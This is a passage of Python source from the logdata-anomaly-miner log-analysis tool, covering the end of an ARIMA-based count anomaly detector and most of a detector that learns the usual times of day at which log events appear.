""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, output_logline=output_logline, learn_mode=learn_mode, num_init=num_init, force_period_length=force_period_length, set_period_length=set_period_length, alpha=alpha, alpha_bt=alpha_bt, num_results_bt=num_results_bt, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_periods_tsa_ini=num_periods_tsa_ini, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Add the PathArimaDetector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < self.num_periods_tsa_ini * int(self.num_init/2): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{self.num_periods_tsa_ini * int(self.num_init/2)} to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = self.num_periods_tsa_ini * int(self.num_init/2) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < self.num_periods_tsa_ini * int(self.num_init/2) + 500: msg = f'Changed the parameter max_num_vals of the 
ETD from {self.event_type_detector.max_num_vals} to ' \ f'{self.num_periods_tsa_ini * int(self.num_init/2) + 500} to use pregenerated critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = self.num_periods_tsa_ini * int(self.num_init/2) + 500 # List of the indices of the target_paths in the ETD self.target_path_index_list = [] # List of the period_lengths self.period_length_list = [] # List of the the single arima_models (statsmodels) self.arima_models = [] # List of the observed values and the predictions of the TSAArima self.prediction_history = [] # List of the the results if th value was in the limits of the one step predictions self.result_list = [] # Minimal number of successes for the binomial test in the last num_results_bt results self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Loads the persistence self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.target_path_index_list, self.period_length_list, self.prediction_history] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): 
"""Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.target_path_index_list = persistence_data[0] self.period_length_list = persistence_data[1] self.prediction_history = persistence_data[2] def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. Tests if the event type includes paths of target_path_list and analyzes their values with an TSA Arima model. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ event_index = self.event_type_detector.current_index if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Check if enough log lines have appeared to calculate the period length, initialize the arima model, or make a prediction if (len(self.period_length_list) <= event_index or self.period_length_list[event_index] is None) and\ len(self.event_type_detector.values[self.event_type_detector.current_index][0]) >= self.num_init: # Extend the list of the period_lengths and target_path_index if necessary if len(self.period_length_list) <= event_index: self.period_length_list += [None for _ in range(len(self.period_length_list), event_index + 2)] self.target_path_index_list += [None for _ in range(len(self.target_path_index_list), event_index + 2)] # Add all paths to the target_path_list if they are included in the ET and solely consist of floats self.target_path_index_list[event_index] = [] for target_path in self.target_path_list: if target_path in self.event_type_detector.variable_key_list[event_index]: var_index = self.event_type_detector.variable_key_list[event_index].index(target_path) if all(type(val) is float for val in 
self.event_type_detector.values[event_index][var_index]): self.target_path_index_list[event_index].append(var_index) # Calculate the period_length of the current event types values counts = [self.event_type_detector.values[event_index][var_index] for var_index in self.target_path_index_list[event_index]] self.calculate_period_length(event_index, counts, log_atom) # Try to initialize the arima model self.test_num_appearance(event_index, log_atom) elif len(self.period_length_list) > event_index and self.period_length_list[event_index] is not None: # Try to initialize or make a prediction with the arima model self.test_num_appearance(event_index, log_atom) return True def calculate_period_length(self, event_index, counts, log_atom): """Returns a list of the period length, if no period was found the value is set to -1""" if self.force_period_length: # Check if the period length should be forced self.period_length_list[event_index] = [self.set_period_length for _ in counts] else: # Calculate the period lengths with the auto correlation function self.period_length_list[event_index] = [None for _ in counts] for target_path_index, data in enumerate(counts): if data is not None: # Apply the autocorrelation function to the data of the single target_paths. 
corr = list(map(abs, sm.tsa.acf(data, nlags=len(data), fft=True))) corr = np.array(corr) min_lag = -1 # Find the first local minimum for i in range(1, len(corr)-1): if corr[i] == min(corr[i-1: i+2]): min_lag = i break # Find the highest peak and set the time-step as the index + lag if min_lag != -1: highest_peak_index = np.argmax(corr[min_lag:]) self.period_length_list[event_index][target_path_index] = int(highest_peak_index + min_lag) # Print a message of the length of the time steps message = f'Calculated the periods for the event {self.event_type_detector.get_event_type(event_index)}: ' \ f'{self.period_length_list[event_index]}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) def test_num_appearance(self, event_index, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance""" # Return, if not TSA should be calculated for this ET if all(period is None for period in self.period_length_list[event_index]): return # Append the lists for the arima models if it is too short if len(self.arima_models) <= event_index: self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.result_list += [None for _ in range(event_index + 1 - len(self.result_list))] if len(self.prediction_history) <= event_index: self.prediction_history += [None for _ in range(event_index + 1 - len(self.prediction_history))] # Initialize the lists for the arima models for this ET if self.arima_models[event_index] is None: self.arima_models[event_index] = [None for _ in range(len(self.target_path_index_list[event_index]))] self.result_list[event_index] = [[] for _ in range(len(self.target_path_index_list[event_index]))] if self.prediction_history[event_index] is None: self.prediction_history[event_index] = [[[], [], []] for _ in range(len(self.target_path_index_list[event_index]))] # Check if the new values are floats if any(not 
self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float) for var_index in self.target_path_index_list[event_index]): delete_indices = [count_index for count_index, var_index in enumerate(self.target_path_index_list[event_index]) if not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float)] delete_indices.sort(reverse=True) for count_index in delete_indices: # Remove the entries of the lists if len(self.target_path_index_list) > event_index and len(self.target_path_index_list[event_index]) > count_index: self.target_path_index_list[event_index] = self.target_path_index_list[event_index][:count_index] +\ self.target_path_index_list[event_index][count_index + 1:] if len(self.period_length_list) > event_index and len(self.period_length_list[event_index]) > count_index: self.period_length_list[event_index] = self.period_length_list[event_index][:count_index] +\ self.period_length_list[event_index][count_index + 1:] if len(self.arima_models) > event_index and len(self.arima_models[event_index]) > count_index: self.arima_models[event_index] = self.arima_models[event_index][:count_index] +\ self.arima_models[event_index][count_index + 1:] if len(self.prediction_history) > event_index and len(self.prediction_history[event_index]) > count_index: self.prediction_history[event_index] = self.prediction_history[event_index][:count_index] +\ self.prediction_history[event_index][count_index + 1:] if len(self.result_list) > event_index and len(self.result_list[event_index]) > count_index: self.result_list[event_index] = self.result_list[event_index][:count_index] +\ self.result_list[event_index][count_index + 1:] # skipcq: PYL-C0209 message = 'Disabled the TSA for the target paths %s of event %s' % ( [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in 
delete_indices], self.event_type_detector.get_event_type(event_index)) affected_path = [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices] self.print(message, log_atom, affected_path) # Initialize and update the arima_model if possible for count_index, var_index in enumerate(self.target_path_index_list[event_index]): # Initialize the arima_model if possible if self.learn_mode and self.arima_models[event_index][count_index] is None: if self.period_length_list[event_index][count_index] is not None: # Add the current value to the lists self.prediction_history[event_index][count_index][0].append(0) self.prediction_history[event_index][count_index][1].append(self.event_type_detector.values[event_index][var_index][-1]) self.prediction_history[event_index][count_index][2].append(0) # Check if enough values have been stored to initialize the arima_model if len(self.event_type_detector.values[event_index][var_index]) >= self.num_periods_tsa_ini *\ self.period_length_list[event_index][count_index]: message = f'Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)} and ' \ f'targetpath {self.event_type_detector.variable_key_list[event_index][count_index]}' affected_path = self.event_type_detector.variable_key_list[event_index][count_index] self.print(message, log_atom, affected_path) # Add the arima_model to the list try: model = statsmodels.tsa.arima.model.ARIMA( self.event_type_detector.values[event_index][var_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:], order=(self.period_length_list[event_index][count_index], 0, 0), seasonal_order=(0, 0, 0, self.period_length_list[event_index][count_index])) self.arima_models[event_index][count_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index][count_index] = None if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: 
self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Make a one-step prediction with the new values elif self.arima_models[event_index][count_index] is not None: count = self.event_type_detector.values[event_index][var_index][-1] # Add the prediction to the lists lower_limit, upper_limit = self.one_step_prediction(event_index, count_index) self.prediction_history[event_index][count_index][0].append(lower_limit) self.prediction_history[event_index][count_index][1].append(count) self.prediction_history[event_index][count_index][2].append(upper_limit) # Shorten the lists if necessary if len(self.prediction_history[event_index][count_index][0]) > self.num_max_time_history: self.prediction_history[event_index][count_index][0] = self.prediction_history[event_index][count_index][0][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][1] = self.prediction_history[event_index][count_index][1][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][2] = self.prediction_history[event_index][count_index][2][ -self.num_min_time_history:] else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Path: ' \ f'{self.event_type_detector.variable_key_list[event_index][var_index]}, Lower: {lower_limit}, Count: ' \ f'{count}, Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index][var_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index][count_index].append(0) else: self.result_list[event_index][count_index].append(1) # Reduce the number of entries in the time history if it gets too large if len(self.result_list[event_index][count_index]) >= 2 * max( self.num_results_bt, 
self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]): self.result_list[event_index][count_index] = self.result_list[event_index][count_index][-max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]):] # Check if the too few or many successes are in the last section of the test history and discard the model # Else update the model for the next step if self.learn_mode and ( sum(self.result_list[event_index][count_index][-self.num_results_bt:]) + max(0, self.num_results_bt - len(self.result_list[event_index][count_index])) < self.bt_min_suc or binom_test(x=sum(self.result_list[event_index][count_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:]), n=self.num_periods_tsa_ini * self.period_length_list[event_index][count_index], p=(1-self.alpha), alternative='greater') < self.alpha_bt): message = f'Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)} and path ' \ f'{self.event_type_detector.variable_key_list[event_index][var_index]}' affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index][count_index] = None self.result_list[event_index][count_index] = [] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: # Update the model self.arima_models[event_index][count_index] = self.arima_models[event_index][count_index].append([count]) def one_step_prediction(self, event_index, count_index): """Make a one step prediction with the Arima model""" prediction = self.arima_models[event_index][count_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return to the order: lower_limit, upper_limit return prediction[0][0], 
prediction[0][1] def bt_min_successes(self, num_bt, p, alpha): # skipcq: PYL-R0201 """ Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = np.math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = '' if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': affected_path} event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {}} if self.event_type_detector.id_path_list: event_data['IDpaths'] = self.event_type_detector.id_path_list event_data['IDvalues'] = list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index]) if confidence is not None: event_data['TypeInfo']['Confidence'] = confidence for listener in self.anomaly_event_handlers: 
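listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self)
PathValueTimeIntervalDetector.py000066400000000000000000000576561437606560100372570ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""
This module defines a detector for time intervals of the appearance of log lines.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import os
import logging
import time

from aminer import AminerConfig
from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, CONFIG_KEY_LOG_LINE_PREFIX,\
    DEFAULT_LOG_LINE_PREFIX
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
from aminer.util import PersistenceUtil


class PathValueTimeIntervalDetector(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    This class analyzes the time intervals of the appearance of log_atoms.

    The considered time intervals depend on the combination of values in the target_paths of target_path_list. All times are
    reduced modulo time_period_length, so every stored time lies in [0, time_period_length).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', target_path_list=None,
                 allow_missing_values_flag=True, ignore_list=None, output_logline=True, learn_mode=False, time_period_length=86400,
                 max_time_diff=360, num_reduce_time_list=10, stop_learning_time=None, stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined
               occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the pathes from paths does
               not refer to an existing parsed data object.
        @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies.
        @param time_period_length length of the time window for which the appearances of log lines are identified with each other.
               Value of 86400 specifies a day and 604800 a week.
        @param max_time_diff maximal time difference in seconds for new times. If the difference of the new time to all previous times
               is greater than max_time_diff the new time is considered an anomaly.
        @param num_reduce_time_list number of new time entries appended to the time list, before the list is being reduced.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["target_path_list", "ignore_list"], aminer_config=aminer_config,
            anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list,
            allow_missing_values_flag=allow_missing_values_flag, ignore_list=ignore_list, output_logline=output_logline,
            learn_mode=learn_mode, time_period_length=time_period_length, max_time_diff=max_time_diff,
            num_reduce_time_list=num_reduce_time_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )

        # Keys: Tuple of values of the paths of target_path_list, Entries: sorted list of all appeared times (modulo
        # time_period_length) for the tuple.
        self.appeared_time_list = {}
        # Keys: Tuple of values of the paths of target_path_list, Entries: Counter of appended times to the time list since last
        # reduction.
        self.counter_reduce_time_intervals = {}

        # Loads the persistence
        self.persistence_id = persistence_id
        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)

        # Imports the persistence
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """
        Analyze if the time of the log_atom appeared in the time interval of a previously appeared times.

        The considered time intervals originate of events with the same combination of values in the target_paths of target_path_list.
        @param log_atom the parsed log atom
        @return True if this handler was really able to handle and process the match.
        """
        if log_atom.atom_time is None:
            return False
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        match_dict = log_atom.parser_match.get_match_dictionary()
        # Skip paths from ignore_list.
        for ignore_path in self.ignore_list:
            if ignore_path in match_dict.keys():
                return False

        # Get current index from combination of values of paths of target_path_list
        id_tuple = ()
        for id_path in self.target_path_list:
            id_match = match_dict.get(id_path)
            if id_match is None:
                if self.allow_missing_values_flag is True:
                    # Insert placeholder for id_path that is not available
                    id_tuple += ('',)
                else:
                    # Omit log atom if one of the id paths is not found.
                    return False
            else:
                if isinstance(id_match.match_object, bytes):
                    id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),)
                else:
                    id_tuple += (id_match.match_object,)

        # Every comparison below works on the position of the time inside the period, not on the absolute timestamp.
        reduced_time = log_atom.atom_time % self.time_period_length

        # Print message if combination of values is new
        if id_tuple not in self.appeared_time_list:
            additional_information = {'AffectedLogAtomValues': [str(repr(val))[2:-1] for val in id_tuple],
                                      'NewTime': reduced_time}
            msg = f'First time ({reduced_time}) detected for ['
            for match_value in id_tuple:
                msg += str(repr(match_value))[1:] + ', '
            msg = msg[:-2] + ']'
            self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information)
            # The first observation is recorded regardless of learn_mode.
            self.appeared_time_list[id_tuple] = [reduced_time]
            self.counter_reduce_time_intervals[id_tuple] = 0
            return True

        # Checks if the time has already been observed
        if reduced_time in self.appeared_time_list[id_tuple]:
            return True

        # Check and print a message if the new time is out of range of the observed times.
        # The upper bound of the chain handles intervals that wrap around 0/self.time_period_length.
        if all(self.max_time_diff < abs(reduced_time - observed) < self.time_period_length - self.max_time_diff
               for observed in self.appeared_time_list[id_tuple]):
            additional_information = {'AffectedLogAtomValues': [str(repr(val))[2:-1] for val in id_tuple],
                                      'PreviousAppearedTimes': [float(val) for val in self.appeared_time_list[id_tuple]],
                                      'NewTime': reduced_time}
            msg = f'New time ({reduced_time}) out of range of previously observed times ' \
                  f'{self.appeared_time_list[id_tuple]} detected for ['
            for match_value in id_tuple:
                msg += str(repr(match_value))[1:] + ', '
            msg = msg[:-2] + ']'
            self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information)

        if not self.learn_mode:
            return True
        if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time

        # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended
        self.insert_and_reduce_time_intervals(id_tuple, reduced_time)
        return True

    def insert_and_reduce_time_intervals(self, id_tuple, new_time):
        """
        Add the new time to the time list and reduce the time list after num_reduce_time_list of times have been appended.

        @param id_tuple key of an existing entry of appeared_time_list.
        @param new_time time reduced modulo time_period_length; it must lie in [0, time_period_length).
        """
        if new_time in self.appeared_time_list[id_tuple]:
            # Nothing to insert. add_to_persistence_event does not pre-check for duplicates; without this guard a time equal to
            # the last list entry would exhaust the next() search below and raise StopIteration, and any other duplicate would
            # be stored twice.
            return
        # Increase the counter of new times since last reduction
        self.counter_reduce_time_intervals[id_tuple] += 1

        # Get the index in which the new time is inserted; the list is kept sorted, so this is the first larger entry.
        if new_time > self.appeared_time_list[id_tuple][-1]:
            time_index = len(self.appeared_time_list[id_tuple])
        else:
            # skipcq: PTC-W0063
            time_index = next(index for index, observed in enumerate(self.appeared_time_list[id_tuple]) if observed > new_time)

        # Insert the new time
        self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:time_index] + [new_time] +\
            self.appeared_time_list[id_tuple][time_index:]

        # Reduce the time intervals, by removing the obsolete entries
        if self.counter_reduce_time_intervals[id_tuple] >= self.num_reduce_time_list:
            # Reset the counter
            self.counter_reduce_time_intervals[id_tuple] = 0

            # Check every entry if it enlarges the time intervals, and remove it, if not. Index 0 is never removed here.
            last_accepted_time = self.appeared_time_list[id_tuple][0] + self.time_period_length
            for index in range(len(self.appeared_time_list[id_tuple])-1, 0, -1):
                if last_accepted_time - self.appeared_time_list[id_tuple][index-1] < 2 * self.max_time_diff:
                    del self.appeared_time_list[id_tuple][index]
                else:
                    last_accepted_time = self.appeared_time_list[id_tuple][index]

            # Checks the last and first two time of the time list, and removes the obsolete entries
            time_list = self.appeared_time_list[id_tuple]
            if (len(time_list) >= 4) and (self.time_period_length + time_list[1] - time_list[-2] < 2 * self.max_time_diff):
                self.appeared_time_list[id_tuple] = time_list[1:len(time_list)-1]
            elif self.time_period_length + time_list[0] - time_list[-2] < 2 * self.max_time_diff:
                self.appeared_time_list[id_tuple] = time_list[:len(time_list)-1]
            elif self.time_period_length + time_list[1] - time_list[-1] < 2 * self.max_time_diff:
                self.appeared_time_list[id_tuple] = time_list[1:]

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted."""
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""
        # Dict keys are tuples, which JSON cannot encode, so both dicts are stored as lists of (key, value) pairs.
        persist_data = [[], []]
        for id_tuple, time_list in self.appeared_time_list.items():
            persist_data[0].append((id_tuple, time_list))
        for id_tuple, counter in self.counter_reduce_time_intervals.items():
            persist_data[1].append((id_tuple, counter))
        PersistenceUtil.store_json(self.persistence_file_name, persist_data)
        logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """
        Load the persistence data from storage.

        The file is treated as trusted local state written by do_persist: its layout is not validated here, so a malformed
        file surfaces as an exception from the indexing below rather than as a handled error.
        """
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # JSON turns the tuple keys into lists; convert them back so lookups in receive_atom hit.
            for id_tuple, time_list in persistence_data[0]:
                self.appeared_time_list[tuple(id_tuple)] = time_list
            for id_tuple, counter in persistence_data[1]:
                self.counter_reduce_time_intervals[tuple(id_tuple)] = counter
        logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def print_persistence_event(self, event_type, event_data):
        """
        Print the persistence of component_name. Event_data specifies what information is output.

        @return a message with information about the persistence.
        @throws Exception when the output for the event_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        # Query if event_data has one of the stated formats
        if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and (
                isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)]) and all(
                isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)):
            msg = 'Event_data has the wrong format. ' \
                  'The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same ' \
                  'length as the defined paths in the config.'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        # Convert path value lists to tuples
        for i in range(len(event_data)):
            event_data[i] = tuple(event_data[i])

        if len(event_data) == 0:
            # Print the set of all appeared path values if no event_data is given
            values_set = set(self.appeared_time_list.keys())
            values_list = list(values_set)
            values_list.sort()
            string = f'Time intervals are tracked for the following path values: {values_list}'
        elif len(event_data) == 1:
            id_tuple = event_data[0]
            # Check if the path value is tracked
            if id_tuple not in self.appeared_time_list:
                return f'Persistence includes no information for {id_tuple}.'

            # Calculate the current time intervals, each clipped to [0, time_period_length].
            time_intervals = [[max(0, t - self.max_time_diff), min(self.time_period_length, t + self.max_time_diff)] for t in
                              self.appeared_time_list[id_tuple]]

            # Add time intervals, when the time intervals exceed the time period length or undercuts zero.
            if self.appeared_time_list[id_tuple][-1] + self.max_time_diff > self.time_period_length:
                time_intervals = [[0, self.appeared_time_list[id_tuple][-1] + self.max_time_diff - self.time_period_length]] +\
                    time_intervals
            if self.appeared_time_list[id_tuple][0] - self.max_time_diff < 0:
                time_intervals = time_intervals +\
                    [[self.appeared_time_list[id_tuple][0] - self.max_time_diff + self.time_period_length, self.time_period_length]]

            # Get the indices of the time windows which intersect and therefore are merged
            indices = [i for i in range(len(time_intervals) - 1) if time_intervals[i][1] > time_intervals[i + 1][0]]

            # Merge the time intervals
            for index in reversed(indices):
                time_intervals[index + 1][0] = time_intervals[index][0]
                time_intervals = time_intervals[:index] + time_intervals[index + 1:]

            # Set output string
            string = f'The list of appeared times is {self.appeared_time_list[id_tuple]} and the resulting time intervals are ' \
                     f'{time_intervals} for path value {id_tuple}'

        return string

    def add_to_persistence_event(self, event_type, event_data):
        """
        Add or overwrite the information of event_data to the persistency of component_name.

        @return a message with information about the addition to the persistency.
        @throws Exception when the addition of this special event using given event_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\
                len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\
                not isinstance(event_data[1], (int, float)):
            msg = 'Event_data has the wrong format. ' \
                  'The supported format is [path_value_list, new_appeared_time], ' \
                  'where path_value_list is a list of strings with the same length as paths defined in the config.'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        id_tuple = tuple(event_data[0])
        new_time = event_data[1]
        msg = ''
        if id_tuple not in self.appeared_time_list:
            # Print message if combination of values is new
            msg = f'First time ({new_time % self.time_period_length}) added for {id_tuple}'
            self.appeared_time_list[id_tuple] = [new_time % self.time_period_length]
            self.counter_reduce_time_intervals[id_tuple] = 0
        else:
            # Print a message if the new time is added to the list of observed times
            msg = f'New time ({new_time % self.time_period_length}) added to the range of previously observed times ' \
                  f'{self.appeared_time_list[id_tuple]} for {id_tuple}'

            # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended
            self.insert_and_reduce_time_intervals(id_tuple, new_time % self.time_period_length)

        return msg

    def remove_from_persistence_event(self, event_type, event_data):
        """
        Remove the time given in event_data from the persistence of component_name.

        @return a message with information about the removal from the persistence.
        @throws Exception when the removal of this special event using given event_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\
                len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\
                not isinstance(event_data[1], (int, float)):
            msg = 'Event_data has the wrong format. ' \
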